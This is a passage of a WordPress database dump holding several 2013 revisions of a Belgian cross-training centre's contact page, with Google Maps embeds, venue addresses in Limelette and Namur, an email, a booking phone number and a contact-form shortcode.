style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 09:54:33', '2013-11-03 09:54:33', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(428, 1, '2013-11-03 09:55:11', '2013-11-03 09:55:11', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<h1 style=\"text-align: center;\">Limelette :</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<h1 style=\"text-align: center;\">Namur :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n<small></small>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 09:55:11', '2013-11-03 09:55:11', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(431, 1, '2013-11-03 10:02:06', '2013-11-03 10:02:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>\r\nLimelette\r\n</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\nLimelette 1342\r\n</address></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>\r\nNamur\r\n</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez 251\r\n5002 Namur\r\n</address></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:02:06', '2013-11-03 10:02:06', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(429, 1, '2013-11-03 09:57:38', '2013-11-03 09:57:38', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1 style=\"text-align: center;\">Limelette :</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\n\r\nAvenue Léon Fournet, 20\r\n\r\nLimelette 1342</address></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1 style=\"text-align: center;\">Namur :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\n\r\nChaussée de Perwez 251\r\n\r\n5002 Namur</address></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 09:57:38', '2013-11-03 09:57:38', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(430, 1, '2013-11-03 10:00:12', '2013-11-03 10:00:12', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\nLimelette\r\n</div>\r\n</div>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\nLimelette 1342\r\n</address></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\nNamur\r\n</div>\r\n</div>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez 251\r\n5002 Namur\r\n</address></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:00:12', '2013-11-03 10:00:12', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(433, 1, '2013-11-03 10:06:28', '2013-11-03 10:06:28', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\nLimelette 1342</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Prise de RDV :</h1>\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:06:28', '2013-11-03 10:06:28', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(432, 1, '2013-11-03 10:03:53', '2013-11-03 10:03:53', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\nLimelette 1342</address>\r\n<a href=mailto:info@crosstrainingcenter.be>info@crosstrainingcenter.be</a>\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez 251\r\n5002 Namur</address><address>\r\n<a href=mailto:info@crosstrainingcenter.be>info@crosstrainingcenter.be</a>\r\n</address></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n&nbsp;\r\n\r\n<a href=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\"><img class=\"size-medium wp-image-390 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map-300x235.png\" width=\"300\" height=\"235\" /></a>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:03:53', '2013-11-03 10:03:53', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(434, 1, '2013-11-03 10:09:11', '2013-11-03 10:09:11', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:09:11', '2013-11-03 10:09:11', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(435, 1, '2013-11-03 10:11:57', '2013-11-03 10:11:57', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:11:57', '2013-11-03 10:11:57', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(437, 1, '2013-11-03 10:15:26', '2013-11-03 10:15:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '421-revision-v1', '', '', '2013-11-03 10:15:26', '2013-11-03 10:15:26', '', 421, 'http://www2.crosstrainingcenter.be/421-revision-v1/', 0, 'revision', '', 0),
(436, 1, '2013-11-03 10:14:15', '2013-11-03 10:14:15', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 